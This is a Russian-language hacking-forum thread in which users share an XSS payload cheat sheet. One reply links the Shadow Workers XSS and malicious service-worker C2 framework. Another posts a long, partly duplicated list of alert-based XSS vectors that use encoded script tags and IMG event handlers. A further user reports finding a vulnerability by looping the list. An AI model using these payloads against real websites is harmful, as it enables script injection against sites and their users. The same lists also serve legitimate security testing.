• XSS.stack #1 – первый литературный журнал от юзеров форума

Читы по XSS

Отслеживать
inside_0day

inside_0day

HDD-drive
Забанен
Регистрация
22.07.2019
Сообщения
24
Реакции
25
Пожалуйста, обратите внимание, что пользователь заблокирован
Модераторы не ругайтесь если не сюда залил.


Конечно сам понимаю что ручками лучше всего искать XSS и прочие инжекты.
Но иногда голова уже дымит и думалка плохо работает, особенно когда долго ищешь что-то.

Или по другому 1500 пейлоадов по XSS, может кому-то да пригодится.
Скрытый контент для зарегистрированных пользователей.
gist.github.com

XSS Vectors Cheat Sheet

XSS Vectors Cheat Sheet. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com gist.github.com
 
Пожалуйста, обратите внимание, что пользователь заблокирован
inside_0day сказал(а):
Модераторы не ругайтесь если не сюда залил.


Конечно сам понимаю что ручками лучше всего искать XSS и прочие инжекты.
Но иногда голова уже дымит и думалка плохо работает, особенно когда долго ищешь что-то.

Или по другому 1500 пейлоадов по XSS, может кому-то да пригодится.
Скрытое содержимое
Все верно. Хороший топик.

Голова нужна чтобы искать новые векторы)) А вот все эти 1500 пайлоадов можно запихнуть в скрипт для поиска. А прямые руки как раз таки и для создания этого скрипта.
 
Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW).
A successful exploitation allows you to browse on the targeted application as the victim(s), as long as the SW (agent) is active. A victim does not have to have a browser tab open in the application for the agent to be active.
The following conditions need to be met in order to be able to achieve SW registration on victims' browsers:


shadow-workers.github.io

Shadow Workers

Shadow Workers: XSS & SW exploitation framework - Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW). The project is hosted here: https://github.com/shadow-workers/shadow-workers A...
shadow-workers.github.io shadow-workers.github.io
 
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"><IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
 
Мужик, ты просто лучший!!!
Два дня уже парюсь с удалением тегов при выводе строки. Прогнал в цикле твой массив и таки нашёл уязвимость, о которой до этого даже не догадывался! Спасибо мужик!
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх